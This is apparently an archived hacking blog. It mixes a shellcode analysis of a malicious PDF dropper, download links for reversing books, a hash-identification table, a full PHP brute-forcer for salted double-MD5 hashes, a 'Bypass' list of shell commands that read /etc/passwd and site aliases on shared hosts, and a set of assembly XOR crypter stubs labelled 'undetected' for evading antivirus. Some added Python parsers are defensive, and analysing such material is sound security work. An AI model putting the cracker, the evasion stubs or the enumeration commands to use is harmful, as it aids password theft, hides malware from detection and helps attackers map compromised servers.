58585FF8   7E006E65

58585FFC   706D6574

58586000   7461622E

58586004   652E7E00

58586008   00006578

5858600C   00000000

58586010   676E6970

58586014   37323120 

58586018   302E302E 

5858601C   2D20312E

58586020   2033206E 

58586024   61742026 

58586028   696B6B73

5858602C   2F206C6C

58586030   41206D69

58586034   626F7263  rt3d.626F7263

58586038   652E7461

5858603C   2F206578

58586040   20262066 

58586044   6B736174

58586048   6C6C696B

5858604C   6D692F20

58586050   72634120

58586054   3364526F 

58586058   78652E32

5858605C   662F2065

58586060   22202620  Annots.22202620

58586064   00220000

58586068   90900000

5858606C   0C909090

58586070   0C0C0C0C


What the shellcode does: it writes ~.exe and ~temp.bat into %TEMP% (both names sit as strings at the end of the dump, next to "kernel32", "shell32" and "open", the ShellExecute verb), plus a PDF with the same name as the document that was opened, presumably as a decoy. The batch file is the command line visible above: ping 127.0.0.1 -n 3 as a sleep, taskkill /im Acrobat.exe /f & taskkill /im AcroRd32.exe /f to kill the reader, then the quoted path the shellcode fills in.

download files = http://www.mediafire.com/?va3mw7fe5vqygha
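Reading strings and argument frames out of a dword dump by eye is error-prone, so here is an added example (written for this page, not part of the original post) that does it mechanically. SAMPLE_DUMP is an excerpt copied from the dump above (the six argument dwords at 58585910 and the string area from 58585F9C on); the parser ignores the annotation column and never joins bytes across a gap between excerpts.

```python
"""Added example, not code from the original post: read a debugger dword dump like
the one above, carve the little-endian ASCII strings out of it and flag the
NtAllocateVirtualMemory argument frame.
"""
import re
import struct

LINE_RE = re.compile(r"^\s*([0-9A-Fa-f]{8})\s+([0-9A-Fa-f]{8})")
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")

# excerpt of the dump above (address, value); annotations after the value are ignored
SAMPLE_DUMP = """
58585910   FFFFFFFF
58585914   00010100
58585918   00000000
5858591C   00010104  UNICODE "=N:="
58585920   00001000
58585924   00000040
58585F9C   72656B02
58585FA0   336C656E
58585FA4   FD890032
58585FD8   68730000
58585FDC   336C6C65
58585FE0   41930032
58585FF4   706F0000
58585FF8   7E006E65
58585FFC   706D6574
58586000   7461622E
58586004   652E7E00
58586008   00006578
5858600C   00000000
58586010   676E6970
58586014   37323120
58586018   302E302E
5858601C   2D20312E
58586020   2033206E
58586024   61742026
58586028   696B6B73
5858602C   2F206C6C
58586030   41206D69
58586034   626F7263
58586038   652E7461
5858603C   2F206578
58586040   20262066
58586044   6B736174
58586048   6C6C696B
5858604C   6D692F20
58586050   72634120
58586054   3364526F
58586058   78652E32
5858605C   662F2065
58586060   22202620
58586064   00220000
"""


def parse_dump(text: str) -> list:
    """[(address, dword)] from lines of the form 'ADDR   VALUE [annotation]'."""
    cells = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            cells.append((int(m.group(1), 16), int(m.group(2), 16)))
    return cells


def contiguous_runs(cells: list) -> list:
    """Split into runs of consecutive addresses so strings are never joined across a gap."""
    runs = []
    for addr, val in cells:
        if runs and addr == runs[-1][-1][0] + 4:
            runs[-1].append((addr, val))
        else:
            runs.append([(addr, val)])
    return runs


def carve_strings(cells: list) -> list:
    """[(address, text)] for every run of 4+ printable bytes, dwords read little-endian."""
    found = []
    for run in contiguous_runs(cells):
        base = run[0][0]
        blob = b"".join(struct.pack("<I", v) for _, v in run)
        for m in PRINTABLE.finditer(blob):
            found.append((base + m.start(), m.group().decode("ascii")))
    return found


def find_alloc_frames(cells: list) -> list:
    """Addresses of six consecutive dwords shaped like the arguments of
    NtAllocateVirtualMemory(-1, &base, 0, &size, MEM_COMMIT, PAGE_EXECUTE_READWRITE)."""
    hits = []
    for i in range(len(cells) - 5):
        run = cells[i:i + 6]
        if any(run[k + 1][0] != run[k][0] + 4 for k in range(5)):
            continue                                   # the frame must be contiguous
        handle, _base, zero_bits, _size, alloc_type, protect = (v for _, v in run)
        if handle == 0xFFFFFFFF and zero_bits == 0 and alloc_type & 0x1000 and protect == 0x40:
            hits.append(run[0][0])
    return hits


if __name__ == "__main__":
    cells = parse_dump(SAMPLE_DUMP)
    for addr, text in carve_strings(cells):
        print(hex(addr), repr(text))
    print("alloc frames:", [hex(a) for a in find_alloc_frames(cells)])
```

Run against the excerpt it recovers "kernel32", "shell32", "open", "~temp.bat", "~.exe" and the batch command line, and flags 0x58585910 as the argument frame. The frame check is deliberately loose (it accepts MEM_COMMIT|MEM_RESERVE) and will also fire on a VirtualAlloc call made through a gadget rather than a raw syscall, which is fine for triage.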

----------------

Dropped payload: the Wisp trojan? (references)

https://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan:Win32/Wisp.A

http://www.threatexpert.com/report.aspx?md5=9f0cefe847174185030a1f027b3813ec

http://www.securityhome.eu/malware/malware.php?mal_id=897505004b9a591d6da897.20308017


Reference: news.softpedia.com

MikroTik (RouterOS / router)


This article is about MikroTik RouterOS: it shows beginners how to set up and start using MikroTik RouterOS on a router.
download link = http://www.mediafire.com/?e5lv6tmq3m7mzou
pass = e-omidfar.blogspot.com

Collisions for Hash Functions MD4, MD5, HAVAL-128 and RIPEMD


The 2004 paper by Xiaoyun Wang, Dengguo Feng, Xuejia Lai and Hongbo Yu that published real collisions for all four functions.

download link = http://www.mediafire.com/?m3pj46cnf888e03

Hiding Shellcode in Plain Sight


download link = http://www.mediafire.com/?d4pk15u24aou4a0
pass = e-omidfar.blogspot.com

Friday, November 26, 2010





Language: Persian.
This article covers MySQL, MSSQL, Oracle, MS Access and PostgreSQL.
download link : http://www.mediafire.com/?3y95tidkod6jud2
pass = e-omidfar.blogpost.com

Hash identification by length and character set

Legend: "hex" = digits and lowercase a-f only (the original list wrote this as "<g": every character sorts below 'g'); "b64" = digits, lowercase, uppercase, + and /, with the = padding given per entry. Lengths are in characters.

ADLER32: length 8, hex
Blowfish (bcrypt): length 60, digits, lowercase, uppercase, / and .; starts with $2a$ (newer implementations also use $2b$ or $2y$), the 7th character from the left is $
CRC-16: length 4, hex
CRC-16-CCITT: length 4, hex
CRC-32: length 8, hex
CRC-32B: length 8, hex
DES (Unix crypt): length 13, lowercase, uppercase, digits, / and .
DCC: length 32, hex
Elf-32: length 9, digits only
FCS-16: length 4, hex
GHash-32-3: length 8, hex
GHash-32-5: length 8, hex
GOST R34.11-94: length 64, hex
Haval128_3: length 32, hex
Haval128_4: length 32, hex
Haval128_5: length 32, hex
Haval128 (Base64): length 24, b64, ends with ==
Haval128 (HMAC): length 32, hex
Haval160: length 40, hex
Haval160_3: length 40, hex
Haval160_4: length 40, hex
Haval160_5: length 40, hex
Haval160 (Base64): length 28, b64, ends with =
Haval160 (HMAC): length 40, hex
Haval192: length 48, hex
Haval192 (Base64): length 32, b64, no padding
Haval192_4: length 48, hex
Haval192_5: length 48, hex
Haval192 (HMAC): length 48, hex
Haval224: length 56, hex
Haval224 (Base64): length 40, b64, ends with ==
Haval224_3: length 56, hex
Haval224_4: length 56, hex
Haval224 (HMAC): length 56, hex
Haval256: length 64, hex
Haval256 (Base64): length 44, b64, ends with =
Haval256_3: length 64, hex
Haval256_4: length 64, hex
Haval256_5: length 64, hex
Haval256 (HMAC): length 64, hex
MD2: length 32, hex
MD2 (Base64): length 24, b64, ends with ==
MD2 (HMAC): length 32, hex
MD4: length 32, hex
MD4 (Base64): length 24, b64, ends with ==
MD4 (HMAC): length 32, hex
MD5: length 32, hex
MD5 (HMAC): length 32, hex
MD5 (Base64): length 24, b64, ends with ==
MD5 (APR): length 37, digits, lowercase, uppercase, . and /; starts with $apr1$, the 15th character from the left is $ (example: $apr1$ZSc84vgF$YiKqBzqnUskAPKeDWlN8/0)
MD5 (Unix): length 34, same character set; starts with $1$, the 12th character from the left is $ (example: $1$P2lE.rGp$SYCpUzBZjWRGKyMe/MbU00)
MySQL (pre-4.1): length 16, hex
MySQL v5.x: length 40, hex (41 with the leading * as stored in mysql.user)
NTLM: length 32, hex
PANAMA: length 64, hex
RipeMD128: length 32, hex
RipeMD128 (Base64): length 24, b64, ends with ==
RipeMD128 (HMAC): length 32, hex
RipeMD160: length 40, hex
RipeMD160 (Base64): length 28, b64, ends with =
RipeMD160 (HMAC): length 40, hex
RipeMD256: length 64, hex
RipeMD256 (Base64): length 44, b64, ends with =
RipeMD256 (HMAC): length 64, hex
RipeMD320: length 80, hex
RipeMD320 (Base64): length 56, b64, ends with ==
RipeMD320 (HMAC): length 80, hex
SHA-0: length 40, hex
SHA-1: length 40, hex
SHA-1 (Base64): length 28, b64, ends with =
SHA-1 (HMAC): length 40, hex
SHA224: length 56, hex
SHA224 (Base64): length 40, b64, ends with ==
SHA224 (HMAC): length 56, hex
SHA256: length 64, hex
SHA256 (Base64): length 44, b64, ends with =
SHA256 (HMAC): length 64, hex
SHA384: length 96, hex
SHA384 (Base64): length 64, b64, no padding
SHA384 (HMAC): length 96, hex
SHA512: length 128, hex
SHA512 (Base64): length 88, b64, ends with ==
SHA512 (HMAC): length 128, hex
SNEFRU128: length 32, hex
SNEFRU128 (Base64): length 24, b64, ends with ==
SNEFRU128 (HMAC): length 32, hex
SNEFRU256: length 64, hex
SNEFRU256 (Base64): length 44, b64, ends with =
SNEFRU256 (HMAC): length 64, hex
Tiger2: length 48, hex
Tiger128: length 32, hex
Tiger128 (Base64): length 24, b64, ends with ==
Tiger128 (HMAC): length 32, hex
Tiger160: length 40, hex
Tiger160 (Base64): length 28, b64, ends with =
Tiger160 (HMAC): length 40, hex
Tiger192: length 48, hex
Tiger192 (Base64): length 32, b64, no padding
Tiger192 (HMAC): length 48, hex
WHIRLPOOL: length 128, hex
WHIRLPOOL (Base64): length 88, b64, ends with ==
WHIRLPOOL (HMAC): length 128, hex
Whirlpool-0: length 128, hex
Whirlpool-1: length 128, hex
Whirlpool-2: length 128, hex
md5(md5($pass)): length 32, hex
md5(md5($pass).$salt): length 32, hex
md5(md5($salt).md5($pass)): length 32, hex
Windows-LM: length 32, digits and uppercase A-F
Windows-NTLM: length 32, digits and uppercase A-F

Length alone is weak evidence: a 32-character hex string can be any of a dozen algorithms or a double MD5, and NTLM is the same 32 hex digits whether printed in upper- or lowercase. The prefixed crypt formats ($1$, $apr1$, $2a$) are the only entries here that identify themselves.
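The table above is easy to turn into a classifier, and doing so makes the ambiguity explicit. The following is an added example, not code from the original post: hex strings are classified by length (returning every algorithm that shares it), crypt-style strings by prefix and field layout, and Base64 strings by decoding them and mapping the digest size back to the same table. The sample inputs in the test are constructed (the empty-string MD5 and its Base64 form, the empty LM hash, the two crypt examples from the table, and a bcrypt string of the right shape only).

```python
"""Added example, not from the original post: a small hash-format identifier that
applies the length / character-set table above."""
import base64
import binascii
import re

HEX_BY_LENGTH = {
    4: ["CRC-16", "CRC-16-CCITT", "FCS-16"],
    8: ["CRC-32", "CRC-32B", "ADLER32", "GHash-32-3", "GHash-32-5"],
    16: ["MySQL (pre-4.1)"],
    32: ["MD5", "MD4", "MD2", "NTLM", "DCC", "RipeMD128", "Haval128", "Tiger128", "SNEFRU128",
         "md5(md5($pass))", "md5(md5($pass).$salt)", "md5(md5($salt).md5($pass))"],
    40: ["SHA-1", "SHA-0", "MySQL v5.x (without the leading *)", "RipeMD160", "Haval160", "Tiger160"],
    48: ["Tiger192", "Tiger2", "Haval192"],
    56: ["SHA224", "Haval224"],
    64: ["SHA256", "RipeMD256", "Haval256", "GOST R34.11-94", "SNEFRU256", "PANAMA"],
    80: ["RipeMD320"],
    96: ["SHA384"],
    128: ["SHA512", "WHIRLPOOL"],
}

# crypt-style formats identify themselves by prefix and field layout, not just length
PREFIXED = [
    (re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), "bcrypt (Blowfish crypt, 60 chars)"),
    (re.compile(r"^\$apr1\$[./A-Za-z0-9]{1,8}\$[./A-Za-z0-9]{22}$"), "MD5 (APR, Apache htpasswd)"),
    (re.compile(r"^\$1\$[./A-Za-z0-9]{1,8}\$[./A-Za-z0-9]{22}$"), "MD5 (Unix crypt)"),
    (re.compile(r"^\*[0-9A-F]{40}$"), "MySQL 4.1+ (as stored, with leading *)"),
    (re.compile(r"^[./A-Za-z0-9]{13}$"), "DES (Unix crypt)"),
]
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def identify(h: str) -> list:
    """Candidate formats for one hash string, most specific first; [] if nothing fits.
    A string that is valid hex is reported as hex even if it would also decode as Base64."""
    h = h.strip()
    for rx, name in PREFIXED:
        if rx.match(h):
            return [name]
    if HEX_RE.match(h):
        names = list(HEX_BY_LENGTH.get(len(h), []))
        if len(h) == 32 and any(c.isupper() for c in h):
            names.insert(0, "Windows-LM / Windows-NTLM (uppercase hex)")
        return names
    if B64_RE.match(h) and len(h) % 4 == 0:
        try:
            digest_len = len(base64.b64decode(h, validate=True))
        except (binascii.Error, ValueError):
            return []
        return [name + " (Base64)" for name in HEX_BY_LENGTH.get(digest_len * 2, [])]
    return []


if __name__ == "__main__":
    for sample in ("d41d8cd98f00b204e9800998ecf8427e", "1B2M2Y8AsgTpgAmY7PhCfg==",
                   "$1$P2lE.rGp$SYCpUzBZjWRGKyMe/MbU00", "$2a$10$" + "a" * 53):
        print(sample, "->", identify(sample))
```

The Base64 branch is the generalisation the table only hints at: padding and length follow from the digest size (16 bytes give 24 characters ending in ==, 20 bytes give 28 ending in =, 24 bytes give 32 with no padding, and so on), so decoding and measuring is more reliable than matching the suffix.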

IDA tutorials

download link = http://www.mediafire.com/?w74a6zrb5j4p8gz
pass = e-omidfar.blogspot.com

Disassembling Code - IDA Pro And SoftICE

download link = http://www.mediafire.com/?0zjy3de2hka8tor
pass = e-omidfar.blogspot.com

Hacker Debugging Uncovered





download link = http://www.mediafire.com/?q7u2509iuc2bl7l
pass = e-omidfar.blogspot.com

Debugging Applications For Microsoft. NET And Microsoft Windows


download link = http://www.mediafire.com/?wcgdanwdp1y5bpt
pass = e-omidfar.blogspot.com

ArtOfDisassembly




download link = http://www.mediafire.com/?sz2cj825i52zmkm
pass = e-omidfar.blogspot.com
pages : 1306

Hacker Disassembling Uncovered


download = http://bl4ckh4t.persiangig.com/blog/Hacker%20Disassembling%20Uncovered%20%28A%20List-%202003%29.rar
passwd = e-omidfar.blogspot.com

Reversing Secrets of Reverse Engineering

pages : 619
download = http://bl4ckh4t.persiangig.com/blog/Reversing.%20Secrets%20of%20Reverse%20Engineering%20.rar
pass : e-omidfar.blogspot.com

Reverse Engineering Code with IDA Pro



pages : 329
download = http://bl4ckh4t.persiangig.com/blog/Reverse%20Engineering%20Code%20with%20IDA%20Pro.rar

pass : e-omidfar.blogspot.com


Thursday, November 25, 2010

Md5(md5(salt)+md5(password)) Bruteforcer

<?php
set_time_limit(0);
/////////////////////////////////////////////////
//
// md5(md5(salt) + md5(password)) bruteforcer
// coder: sp1r1t
// www.security-shell.com
// version: 1.0
// this script works only if hashing is done like this md5(md5(salt) + md5(password))
//
/////////////////////////////////////////////////

// INSERT YOUR HASH AND SALT HERE:
$hash = "";
$salt = "";

// STEALTH MODE ON=1 OFF=0 (if stealth is ON, cpu usage will be low and normal, but bruteforcer will be slower;
// if stealth mode is OFF, cpu usage will be 100% but bruteforcer will be faster)
$stealth = 0;

// ARRAYS WITH CHARACTERS TO USE IN BRUTEFORCING PROCESS
// IF YOU ADD YOUR ARRAY MAKE SURE YOU PUT IT IN ARRAY_MERGE FUNCTION TO JOIN THE OTHER ARRAYS
$lower = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
$numeric = array('0','1','2','3','4','5','6','7','8','9');
$upper = array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z');
$GTFO = array_merge($lower, $numeric, $upper);

// KEEP AWAY FROM THIS PIECE OF CODE IF YOU DON'T KNOW WHAT YOU'RE DOING
$found = 0;
$count = count($GTFO);
$hash = strtolower($hash);

if(strlen($hash) == 32) {
//----------------------------------------------1--------------------------------------------------
for($i1=0;$i1<$count;$i1++) {
 if(md5(md5($salt).md5($GTFO[$i1])) == $hash) {
  writetofile("$hash : ".$GTFO[$i1],$salt);
  $found = 1;
  break;
 }
 if($stealth == 1) usleep(1);
}
//----------------------------------------------2--------------------------------------------------
if($found != 1)
 for($i20=0;$i20<$count;$i20++)
  for($i21=0;$i21<$count;$i21++) {
   if(md5(md5($salt).md5($GTFO[$i20].$GTFO[$i21])) == $hash) {
    writetofile("$hash : ".$GTFO[$i20].$GTFO[$i21],$salt);
    $found = 1;
    break;
   }
   if($stealth == 1) usleep(1);
  }
//----------------------------------------------3--------------------------------------------------
if($found != 1)
 for($i30=0;$i30<$count;$i30++)
  for($i31=0;$i31<$count;$i31++)
   for($i32=0;$i32<$count;$i32++) {
    if(md5(md5($salt).md5($GTFO[$i30].$GTFO[$i31].$GTFO[$i32])) == $hash) {
     writetofile("$hash : ".$GTFO[$i30].$GTFO[$i31].$GTFO[$i32],$salt);
     $found = 1;
     break;
    }
    if($stealth == 1) usleep(1);
   }
//----------------------------------------------4--------------------------------------------------
if($found != 1)
 for($i40=0;$i40<$count;$i40++)
  for($i41=0;$i41<$count;$i41++)
   for($i42=0;$i42<$count;$i42++)
    for($i43=0;$i43<$count;$i43++) {
     if(md5(md5($salt).md5($GTFO[$i40].$GTFO[$i41].$GTFO[$i42].$GTFO[$i43])) == $hash) {
      writetofile("$hash : ".$GTFO[$i40].$GTFO[$i41].$GTFO[$i42].$GTFO[$i43],$salt);
      $found = 1;
      break;
     }
     if($stealth == 1) usleep(1);
    }
//----------------------------------------------5--------------------------------------------------
if($found != 1)
 for($i50=0;$i50<$count;$i50++)
  for($i51=0;$i51<$count;$i51++)
   for($i52=0;$i52<$count;$i52++)
    for($i53=0;$i53<$count;$i53++)
     for($i54=0;$i54<$count;$i54++) {
      if(md5(md5($salt).md5($GTFO[$i50].$GTFO[$i51].$GTFO[$i52].$GTFO[$i53].$GTFO[$i54])) == $hash) {
       writetofile("$hash : ".$GTFO[$i50].$GTFO[$i51].$GTFO[$i52].$GTFO[$i53].$GTFO[$i54],$salt);
       $found = 1;
       break;
      }
      if($stealth == 1) usleep(1);
     }
//----------------------------------------------6--------------------------------------------------
if($found != 1)
 for($i60=0;$i60<$count;$i60++)
  for($i61=0;$i61<$count;$i61++)
   for($i62=0;$i62<$count;$i62++)
    for($i63=0;$i63<$count;$i63++)
     for($i64=0;$i64<$count;$i64++)
      for($i65=0;$i65<$count;$i65++) {
       if(md5(md5($salt).md5($GTFO[$i60].$GTFO[$i61].$GTFO[$i62].$GTFO[$i63].$GTFO[$i64].$GTFO[$i65])) == $hash) {
        writetofile("$hash : ".$GTFO[$i60].$GTFO[$i61].$GTFO[$i62].$GTFO[$i63].$GTFO[$i64].$GTFO[$i65],$salt);
        $found = 1;
        break;
       }
       if($stealth == 1) usleep(1);
       } //----------------------------------------------7--------------------------------------------------
 if($found != 1)
 for($i70=0;$i70<$count;$i70++)
  for($i71=0;$i71<$count;$i71++)
   for($i72=0;$i72<$count;$i72++)
    for($i73=0;$i73<$count;$i73++)
     for($i74=0;$i74<$count;$i74++)
      for($i75=0;$i75<$count;$i75++)
       for($i76=0;$i76<$count;$i76++) {
        if(md5(md5($salt).md5($GTFO[$i70].$GTFO[$i71].$GTFO[$i72].$GTFO[$i73].$GTFO[$i74].$GTFO[$i75].$GTFO[$i76])) == $hash) {
         writetofile("$hash : ".$GTFO[$i70].$GTFO[$i71].$GTFO[$i72].$GTFO[$i73].$GTFO[$i74].$GTFO[$i75].$GTFO[$i76],$salt);
         $found = 1;
         break;
        }
        if($stealth == 1) usleep(1);
        } //----------------------------------------------8--------------------------------------------------
 if($found != 1)
 for($i80=0;$i80<$count;$i80++)
  for($i81=0;$i81<$count;$i81++)
   for($i82=0;$i82<$count;$i82++)
    for($i83=0;$i83<$count;$i83++)
     for($i84=0;$i84<$count;$i84++)
      for($i85=0;$i85<$count;$i85++)
       for($i86=0;$i86<$count;$i86++)
        for($i87=0;$i87<$count;$i87++) {
         if(md5(md5($salt).md5($GTFO[$i80].$GTFO[$i81].$GTFO[$i82].$GTFO[$i83].$GTFO[$i84].$GTFO[$i85].$GTFO[$i86].$GTFO[$i87])) == $hash) {
          writetofile("$hash : ".$GTFO[$i80].$GTFO[$i81].$GTFO[$i82].$GTFO[$i83].$GTFO[$i84].$GTFO[$i85].$GTFO[$i86].$GTFO[$i87],$salt);
          $found = 1;
          break;
         }
         if($stealth == 1) usleep(1);
         } //----------------------------------------------9--------------------------------------------------
 if($found != 1)
 for($i90=0;$i90<$count;$i90++)
  for($i91=0;$i91<$count;$i91++)
   for($i92=0;$i92<$count;$i92++)
    for($i93=0;$i93<$count;$i93++)
     for($i94=0;$i94<$count;$i94++)
      for($i95=0;$i95<$count;$i95++)
       for($i96=0;$i96<$count;$i96++)
        for($i97=0;$i97<$count;$i97++)
         for($i98=0;$i98<$count;$i98++) {
          if(md5(md5($salt).md5($GTFO[$i90].$GTFO[$i91].$GTFO[$i92].$GTFO[$i93].$GTFO[$i94].$GTFO[$i95].$GTFO[$i96].$GTFO[$i97].$GTFO[$i98])) == $hash) {
           writetofile("$hash : ".$GTFO[$i90].$GTFO[$i91].$GTFO[$i92].$GTFO[$i93].$GTFO[$i94].$GTFO[$i95].$GTFO[$i96].$GTFO[$i97].$GTFO[$i98],$salt);
           $found = 1;
           break;
          }
          if($stealth == 1) usleep(1);
          } //----------------------------------------------10-------------------------------------------------
 if($found != 1)
 for($i100=0;$i100<$count;$i100++)
  for($i101=0;$i101<$count;$i101++)
   for($i102=0;$i102<$count;$i102++)
    for($i103=0;$i103<$count;$i103++)
     for($i104=0;$i104<$count;$i104++)
      for($i105=0;$i105<$count;$i105++)
       for($i106=0;$i106<$count;$i106++)
        for($i107=0;$i107<$count;$i107++)
         for($i108=0;$i108<$count;$i108++)
          for($i109=0;$i109<$count;$i109++) {
           if(md5(md5($salt).md5($GTFO[$i100].$GTFO[$i101].$GTFO[$i102].$GTFO[$i103].$GTFO[$i104].$GTFO[$i105].$GTFO[$i106].$GTFO[$i107].$GTFO[$i108].$GTFO[$i109])) == $hash) {
            writetofile("$hash : ".$GTFO[$i100].$GTFO[$i101].$GTFO[$i102].$GTFO[$i103].$GTFO[$i104].$GTFO[$i105].$GTFO[$i106].$GTFO[$i107].$GTFO[$i108].$GTFO[$i109],$salt);
            $found = 1;
            break;
           }
           if($stealth == 1) usleep(1);
           } //----------------------------------------------END------------------------------------------------
 if($found == 0) writetofile("$hash : hash not found");
}
function writetofile($string,$string2="") { // $string2 (the salt) defaults to "" because the "hash not found" call passes only one argument
 $file = fopen("Cracked.txt", "a") or die("error");
 fwrite($file, "salt : ".$string2."\n");
 fwrite($file, $string."\n");
 fclose($file);
} ?>

Bypass: Read Users From /etc/passwd

awk -F: '{ print $1 }' /etc*/passwd | sort

---

awk -F: '{ print $1 " "$2 " " $3" "$4" "$5 " "$6" "$7" "}' /etc*/passwd | sort

---

cd /etc;cat passwd

---

cat /etc/valiases/xxx.com

awk -F":" '{ print "username: " $1 "\t\tuid:" $3 }' /etc/passwd
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
ls -la /etc/valiases/site.com   (the owner of this file shows which user the site belongs to)
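
The same /etc/passwd fields the awk one-liners above pull out, parsed in Python as an added example (not from the original page): it reads constructed passwd lines rather than a real file and reports UID 0 accounts (the `$3 == 0` check above), accounts with an interactive login shell, and UIDs shared by more than one account, which is what an administrator auditing a shared host checks for. The function names and the sample entries are made up for this example.

```python
"""Audit passwd(5) content for the things the awk one-liners above look at."""
from collections import defaultdict

# Constructed sample content, not taken from any real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# comment line that a naive parser would choke on
bin:x:2:2:bin:/bin:/usr/sbin/nologin
toor:x:0:0:backup root:/root:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/zsh
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
shared:x:1001:1001:Shared uid:/home/shared:/bin/false
"""

# Shells that do not give an interactive login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", ""}


def parse_passwd(text):
    """Return a list of (name, uid, gid, gecos, home, shell) tuples.

    Skips blank lines and comments (the `grep -v '^#'` step above) and
    drops malformed lines instead of raising, so one bad line cannot
    hide the rest of the file from the audit.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # wrong field count
        name, _pw, uid, gid, gecos, home, shell = fields
        try:
            entries.append((name, int(uid), int(gid), gecos, home, shell))
        except ValueError:
            continue  # non-numeric uid/gid
    return entries


def uid_zero_accounts(entries):
    """Accounts with UID 0: anything here besides root needs an explanation."""
    return sorted(e[0] for e in entries if e[1] == 0)


def interactive_accounts(entries):
    """Accounts whose login shell is not one of the nologin shells."""
    return sorted(e[0] for e in entries if e[5] not in NOLOGIN_SHELLS)


def duplicate_uids(entries):
    """Map uid -> sorted account names for every uid used by more than one account."""
    by_uid = defaultdict(list)
    for e in entries:
        by_uid[e[1]].append(e[0])
    return {uid: sorted(names) for uid, names in by_uid.items() if len(names) > 1}


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("uid 0      :", uid_zero_accounts(entries))
    print("interactive:", interactive_accounts(entries))
    print("dup uids   :", duplicate_uids(entries))
```

To run it against a real file, replace SAMPLE_PASSWD with the contents of /etc/passwd; the parser ignores the `x` password field, so it works the same on shadowed systems.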

Asm Encryptor

//////////////////////////////////////////////
PUSHAD
MOV BL,88
NEG BL
ROR BL,4
NOT BL
XOR BL,AL
NOT BL
ROR BL,4
NEG BL
PUSH 1
PUSH 1
MOV EAX,{TOP}
INC BL
L013:
XOR [BYTE DS:EAX],BL
INC EAX
DEC EAX
INC EAX
CMP EAX,{END}
JLE L013
JMP OEP
POPAD
PUSH 1
PUSH 1
RETN

XOR encryption method (haZl0oh's method)..

//////////////////////////////////////////////
Standard XOR Manual Undetected Method
PUSHAD
MOV BL,88
NEG BL
ROR BL,4
NOT BL
XOR BL,AL
NOT BL
ROR BL,4
NEG BL
PUSH 1
PUSH 1
MOV EAX,{TOP}
INC BL
XOR [BYTE DS:EAX],BL
INC EAX
DEC EAX
INC EAX
CMP EAX,{END}
JLE (XOR [BYTE DS:EAX],BL Address)
JMP OEP
POPAD
PUSH 1
PUSH 1
RETN

//////////////////////////////////////////////
InTheComE Pack Method
PUSH EAX [ N.E.P ]
PUSH ECX
PUSH ESP
PUSH EBP
PUSH 24
PUSH 21
PUSH [OEP]
CALL [ CALL ]
PUSH ESI
PUSH EBX
CALL ESI
CALL EBX
CALL ESP
CALL ECX
CALL EAX
PUSH 20
RETN

//////////////////////////////////////////////
Loop Crypting

mov eax, *TOP*
mov ecx, *länge*
ptr:
xor byte ptr[eax+ecx], *key*
loopd ptr

//////////////////////////////////////////////
Metamorph Crypting:

MOV EDX, TOP
MOV CL, 5
X: ADD [EDX], 5
XOR [EDX], 7
Y: SUB [EDX], 5
ADD CL, 2
MOV [X+2], CL
MOV [Y+2], CL
INC EDX
CMP EDX, END
JLE X

//////////////////////////////////////////////
ByPiT XoR
CMP AX,8
PUSH EAX
MOV EAX,EBP
PUSH (o.e.p)
PUSH 88
PUSH 77
PUSH (o.e.p)
CALL (call)

//////////////////////////////////////////////
UD
PUSH EBP
MOV EBP,ESP
MOV EAX,[Near PUSH EBP +10]
INC EAX
CMP EAX,EBP
SUB ESI,4
PUSH[Alter EP]
RETN

//////////////////////////////////////////////
A simple xor
xor:PUSH EBP
MOV BL, 88
PUSH 99
XOR BL, AL
PUSH 1
PUSH 1
DEC EAX
JMP(push oep)
JLE(call oep)
RETN

//////////////////////////////////////////////
A nice XOR
DEC ECX
DEC EAX
PUSH EBP
MOV EBP,ESP
PUSH (DEC ECX)
PUSH 99
PUSH 11
PUSH (DEC EAX)
PUSH (TOP PUSH )
CALL (TOP CALL )

//////////////////////////////////////////////
A very nice XoR for VB
PUSH ESP
PUSH EBP
PUSH EDX
PUSH ECX
NEG EAX
PUSH(Orginal entrypoint)
CALL(orginal call entrypoint)
XCHG DH, CH
PUSH 3788
PUSH 3764
PUSH 3768
PUSH 3772
PUSH 3531
CALL EAX
CALL ESI
CALL EBX
NOT EAX
XOR EAX,EDI
XOR CH,DH
INC ESI
DEC EBP
CALL ESP
JMP (XOR EAX,EDI entrypoint)
JLE (XOR CH,DH Entrypoint)
ROR AL,6
NOT EAX
PUSH 0
RETN

//////////////////////////////////////////////
xor packing
PUSH EBP
MOV EBP, ESP
PUSH ESI
PUSH EDI
PUSH EBX
MOV ESI, ESP
PUSH DWORD PTR SS:[EBP+14]
PUSH DWORD PTR SS:[EBP+10]
PUSH DWORD PTR SS:[EBP+C]
CALL NEAR DWORD PTR SS:[EBP+8]
MOV ESP, ESI
POP EBX
POP EDI
POP ESI
POP EBP
RETN 10

//////////////////////////////////////////////
lods Routine ( xor ) MANUAL PACKING
xor eax, eax
xor ebx, ebx
mov esi, *start address of your code to crypt*
mov edi, esi

start:
lodsb
add bl, 25 ; changeable!
add bh, 33 ; changeable!!
add ah, 23 ; changeable!!
add al, ah
xor al, bl
sub al, bh
stosb
cmp esi, *end address of your code to crypt*
jle start
jmp OEP

thanks haZl0oh

//////////////////////////////////////////////
NEG_NOT_ROR Xor routine by haZl0oh
MOV BL,88
NEG BL
ROR BL,4
NOT BL
XOR BL,AL
NOT BL
ROR BL,4
NEG BL
MOV EAX, "start of your code to crypt"
INC BL
XOR BYTE PTR DS:[EAX],BL <<<<<<<<<<< *theseadress
INC EAX
